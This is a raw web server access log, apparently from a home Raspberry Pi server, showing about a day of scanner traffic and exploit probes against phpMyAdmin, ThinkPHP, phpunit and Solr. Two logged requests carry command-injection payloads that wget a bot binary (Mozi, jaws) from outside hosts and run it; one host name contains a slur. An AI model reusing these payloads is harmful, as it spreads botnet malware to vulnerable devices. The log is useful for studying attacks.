Fri Feb 14 06:25:06 MST 2020 06:25:06 up 13 days, 18:28, 1 user, load average: 0.56, 0.36, 0.47 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 13days 10:52 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 222.186.19.221 - - [14/Feb/2020:14:25:42 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 81.12.78.26 - - [14/Feb/2020:14:34:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 36.74.115.103 - - [14/Feb/2020:14:38:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.101.0.209 - - [14/Feb/2020:16:06:35 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.128.78.14 - - [14/Feb/2020:16:10:54 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 178.128.78.14 - - [14/Feb/2020:16:10:54 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:16:10:54 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:16:10:54 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:16:10:54 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:16:10:55 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [14/Feb/2020:16:23:34 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [14/Feb/2020:16:23:37 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [14/Feb/2020:16:30:23 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 82.68.206.30 - - [14/Feb/2020:16:44:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 82.68.206.30 - - [14/Feb/2020:16:44:04 +0000] "GET / HTTP/1.1" 200 25000 "" "" 175.143.235.151 - - [14/Feb/2020:17:22:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 42.112.6.199 - - [14/Feb/2020:18:22:49 +0000] "GET / HTTP/1.1" 400 0 "" "" 41.216.186.89 - - [14/Feb/2020:18:30:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 197.246.202.133 - - [14/Feb/2020:18:52:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 177.38.180.95 - - [14/Feb/2020:19:12:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 106.12.69.27 - - [14/Feb/2020:19:28:20 +0000] "POST /cgi-bin/rdfs.cgi HTTP/1.1" 404 0 "" "" 106.12.69.27 - - [14/Feb/2020:19:28:21 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:00 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:00 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:00 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:00 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:00 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.9 - - [14/Feb/2020:19:47:01 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.14 - - [14/Feb/2020:20:28:28 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 177.72.88.40 - - [14/Feb/2020:20:49:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 42.230.218.129 - - [14/Feb/2020:21:16:15 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.230.218.129:44501/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 200.166.73.114 - - [14/Feb/2020:21:39:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 187.56.237.18 - - [14/Feb/2020:22:49:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 178.128.78.70 - - [14/Feb/2020:23:41:57 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 178.128.78.70 - - [14/Feb/2020:23:41:57 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.70 - - [14/Feb/2020:23:41:57 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.70 - - [14/Feb/2020:23:41:58 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.70 - - [14/Feb/2020:23:41:58 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.78.70 - - [14/Feb/2020:23:41:58 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [14/Feb/2020:23:56:02 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:00:00:37 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:00:00:40 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [15/Feb/2020:00:02:56 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 186.48.92.38 - - [15/Feb/2020:01:11:10 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.57.40.38 - - [15/Feb/2020:02:41:22 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 90.146.11.186 - - [15/Feb/2020:03:17:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 193.57.40.38 - - [15/Feb/2020:04:04:28 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 109.94.120.132 - - [15/Feb/2020:04:18:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 167.99.73.165 - - [15/Feb/2020:04:19:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 218.164.71.217 - - [15/Feb/2020:04:22:19 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 218.164.71.217 - - [15/Feb/2020:04:22:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.101.0.209 - - [15/Feb/2020:04:47:43 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [15/Feb/2020:04:57:12 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 223.197.175.172 - - [15/Feb/2020:05:50:47 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.57.40.38 - - [15/Feb/2020:06:01:40 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 117.50.137.25 - - [15/Feb/2020:06:43:24 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.50.137.25 - - [15/Feb/2020:06:43:24 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:25 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:26 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:26 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:27 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:28 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:28 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 117.50.137.25 - - [15/Feb/2020:06:43:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 162.243.128.57 - - [15/Feb/2020:06:48:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 35.243.143.0 - - [15/Feb/2020:07:24:33 +0000] "GET /dd06d16ddce4ee3094e80f3c840bb567.php HTTP/1.1" 404 0 "" "" 35.243.143.0 - - [15/Feb/2020:07:24:34 +0000] "GET /097C08F2AC3BF8F02E25CC3994507EA8.php HTTP/1.1" 404 0 "" "" 35.243.143.0 - - [15/Feb/2020:07:24:34 +0000] "GET /9bed1ce23611489f4c3793d01765ec68.php HTTP/1.1" 404 0 "" "" 35.243.143.0 - - [15/Feb/2020:07:24:34 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 0 "" "" 35.243.143.0 - - [15/Feb/2020:07:24:35 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 404 0 "" "" 212.98.138.150 - - [15/Feb/2020:07:44:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 46.21.214.105 - - [15/Feb/2020:08:48:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 193.57.40.38 - - [15/Feb/2020:09:10:52 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 181.92.46.140 - - [15/Feb/2020:10:17:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 177.67.5.73 - - [15/Feb/2020:10:19:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 154.47.131.203 - - [15/Feb/2020:10:25:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.242.25.247 - - [15/Feb/2020:10:56:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 92.118.161.57 - - [15/Feb/2020:11:03:46 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 118.25.185.92 - - [15/Feb/2020:11:26:51 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 118.25.185.92 - - [15/Feb/2020:11:26:54 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:55 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:57 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:57 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:58 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:58 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:59 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 118.25.185.92 - - [15/Feb/2020:11:26:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 46.241.120.165 - - [15/Feb/2020:12:17:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 100.11.48.113 - - [15/Feb/2020:12:20:57 +0000] "GET / HTTP/1.1" 400 0 "" "" Sat Feb 15 06:25:06 MST 2020 06:25:06 up 14 days, 18:28, 1 user, load average: 0.33, 0.24, 0.41 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 14days 11:27 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE